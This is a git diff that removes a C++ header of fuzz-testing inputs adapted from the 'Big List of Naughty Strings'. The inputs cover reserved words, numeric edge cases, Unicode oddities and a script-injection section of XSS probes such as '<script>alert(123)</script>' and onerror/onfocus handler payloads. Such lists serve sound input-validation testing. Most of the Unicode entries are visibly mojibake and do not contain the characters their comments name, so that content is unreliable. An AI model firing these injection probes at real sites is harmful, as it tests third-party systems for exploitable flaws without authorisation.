Diffstat (limited to 'include/big_list_of_naughty_strings.hpp')
-rw-r--r-- | include/big_list_of_naughty_strings.hpp | 1149 |
1 files changed, 463 insertions, 686 deletions
diff --git a/include/big_list_of_naughty_strings.hpp b/include/big_list_of_naughty_strings.hpp
index 4ba27f73e4..2d1ca0dd74 100644
--- a/include/big_list_of_naughty_strings.hpp
+++ b/include/big_list_of_naughty_strings.hpp
@@ -1,687 +1,464 @@ const std::string naughty_strings[] = { -// sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt - -// Reserved Strings -// -// Strings which may be used elsewhere in code - -"undefined", -"undef", -"null", -"NULL", -"(null)", -"nil", -"NIL", -"true", -"false", -"True", -"False", -"TRUE", -"FALSE", -"None", -"hasOwnProperty", -"\\", -"\\\\", - -// Numeric Strings -// -// Strings which can be interpreted as numeric - -"0", -"1", -"1.00", -"$1.00", -"1/2", -"1E2", -"1E02", -"1E+02", -"-1", -"-1.00", -"-$1.00", -"-1/2", -"-1E2", -"-1E02", -"-1E+02", -"1/0", -"0/0", -"-2147483648/-1", -"-9223372036854775808/-1", -"-0", -"-0.0", -"+0", -"+0.0", -"0.00", -"0..0", -".", -"0.0.0", -"0,00", -"0,,0", -",", -"0,0,0", -"0.0/0", -"1.0/0.0", -"0.0/0.0", -"1,0/0,0", -"0,0/0,0", -"--1", -"-", -"-.", -"-,", -"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", -"NaN", -"Infinity", -"-Infinity", -"INF", -"1#INF", -"-1#IND", -"1#QNAN", -"1#SNAN", -"1#IND", -"0x0", -"0xffffffff", -"0xffffffffffffffff", -"0xabad1dea", -"123456789012345678901234567890123456789", -"1,000.00", -"1 000.00", -"1'000.00", -"1,000,000.00", -"1 000 000.00", -"1'000'000.00", -"1.000,00", -"1 000,00", -"1'000,00", -"1.000.000,00", -"1 000 000,00", -"1'000'000,00", -"01000", -"08", -"09", -"2.2250738585072011e-308", - -// Special Characters -// -// ASCII punctuation. All of these characters may need to be escaped in some -// contexts. Divided into three groups based on (US-layout) keyboard position. - -",./;'[]\\-=", -"<>?:\"{}|_+", -"!@#$%^&*()`~", - -// Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, -// and U+007F (DEL) -// Often forbidden to appear in various text-based file formats (e.g. XML), -// or reused for internal delimiters on the theory that they should never -// appear in input. -// The next line may appear to be blank or mojibake in some viewers. 
-"", - -// Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. -// Commonly misinterpreted as additional graphic characters. -// The next line may appear to be blank, mojibake, or dingbats in some viewers. -"ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", - -// Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode -// version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), -// and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often -// treated as whitespace in some contexts. -// This file unfortunately cannot express strings containing -// U+0000, U+000A, or U+000D (NUL, LF, CR). -// The next line may appear to be blank or mojibake in some viewers. -// The next line may be flagged for \"trailing whitespace\" in some viewers. -" "," ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", - -// Unicode additional control characters: all of the characters with -// general category Cf (in Unicode 8.0.0). -// The next line may appear to be blank or mojibake in some viewers. -"ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠタᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ", - -// \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. -// The next two lines may appear to be blank or mojibake in some viewers. -"ᄏ", -"ᄒ", - -// Unicode Symbols -// -// Strings which contain common unicode symbols (e.g. 
smart quotes) - -"ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", -"ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", -"ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", -"ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", -"ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", -"ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", -"ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", -"`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", -"¬ナロ¬ナワ¬ナン¬ナ゙", -"チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフヘホマ", -"ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", - -// Unicode Subscript/Superscript/Accents -// -// Strings which contain unicode subscripts/superscripts; can cause rendering issues - -"¬チᄚ¬チᄡ¬チᄉ", -"¬ツタ¬ツチ¬ツツ", -"¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", -"¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", - -// Quotation Marks -// -// Strings which contain misplaced quotation marks; can cause encoding errors - -"'", -"\"", -"''", -"\"\"", -"'\"'", -"\"''''\"'\"", -"\"'\"'\"''''\"", -"<foo val=¬タワbar¬タン />", -"<foo val=¬タワbar¬タン />", -"<foo val=¬タンbar¬タワ />", -"<foo val=`bar' />", - -// Two-Byte Characters -// -// Strings which contain two-byte characters: can cause rendering issues or character-length issues - -"ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", -" ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", -"¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", -"←テᄄ│ミᄑ₩ᅠᄐ", -"↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", -"↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ →リᅠ→ᄚᄅ↑ᄚチ■ユリ", 
-"ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", -"↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", -"ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", - -// Changing length when lowercased -// -// Characters which increase in length (2 to 3 bytes) when lowercased -// Credit: https://twitter.com/jifa/status/625776454479970304 - -"ᄎ", -"ᄒ", - -// Japanese Emoticons -// -// Strings which consists of Japanese-style emoticons which are popular on the web - -" ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", -"(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", -"ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", -"__ᄒロ(,_,*)", -" ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", -"ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", -", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", -"(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", -"(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", -"¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", -"( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", - -// Emoji -// -// Strings which contain Emoji; should be the same behavior as two-byte characters, but not always - -"゚リヘ", -"゚ムᄅ゚マᄑ", -"゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", -"゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", -"¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ ゚メル", -"¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", -"゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", -"0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ ゚ヤ゚", - -// Regional Indicator Symbols -// -// Regional Indicator Symbols can be displayed differently across -// fonts, and have a number of special behaviors - -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", - -// Unicode Numbers -// -// Strings which contain unicode numbers; if the code is localized, it should see the input as numeric - -"ᄐムᄐメᄐモ", -"ᄀᄁᆪ", - -// Right-To-Left Strings -// -// Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) - -"ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. 
ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", -"ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", -"ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", -"ᄋᄑ", -"ᄋᄎ", -"ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", - -// Trick Unicode -// -// Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) - -"¬タᆰ¬タᆰtest¬タᆰ", -"¬タᆱtest¬タᆱ", -"¬タᄅtest¬タᄅ", -"test¬チᅠtest¬タᆱ", -"¬チᆭtest¬チᄃ", - -// Zalgo Text -// -// Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) - -"£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", -"ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ.ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", -"ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", -"ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", -"Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", - -// Unicode Upsidedown -// 
-// Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) - -"ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ ᆵᅦンᄍoᅨᆬ", -"00ᅨルᅥヨ$-", - -// Unicode font -// -// Strings which contain bold/italic/etc. versions of normal characters - -"ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", -"ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ ンミᄄンミᆵンミ゙ンミᆱ ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ ンミンンミᄄンミᅠ", -"ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ ンヨノンヨヤンヨフ", -"ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ ンメナンメミンメネ", -"ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ ンモᆳンモᄌンモᄚ", -"ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ ンユユンユᅠンユリ", -"ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ ンレヘンレリンレミ", -"¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ ¬メ゚¬メᆰ¬メᄁ", - -// Script Injection -// -// Strings which attempt to invoke a benign script injection; shows vulnerability to XSS - -"<script>alert(123)</script>", -"<script>alert('123');</script>", -"<img src=x onerror=alert(123) />", -"<svg><script>123<1>alert(123)</script>", -"\"><script>alert(123)</script>", -"'><script>alert(123)</script>", -"><script>alert(123)</script>", -"</script><script>alert(123)</script>", -"< / script >< script >alert(123)< / script >", -" onfocus=JaVaSCript:alert(123) autofocus", -"\" onfocus=JaVaSCript:alert(123) autofocus", -"' onfocus=JaVaSCript:alert(123) autofocus", -"ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", -"<sc<script>ript>alert(123)</sc</script>ript>", 
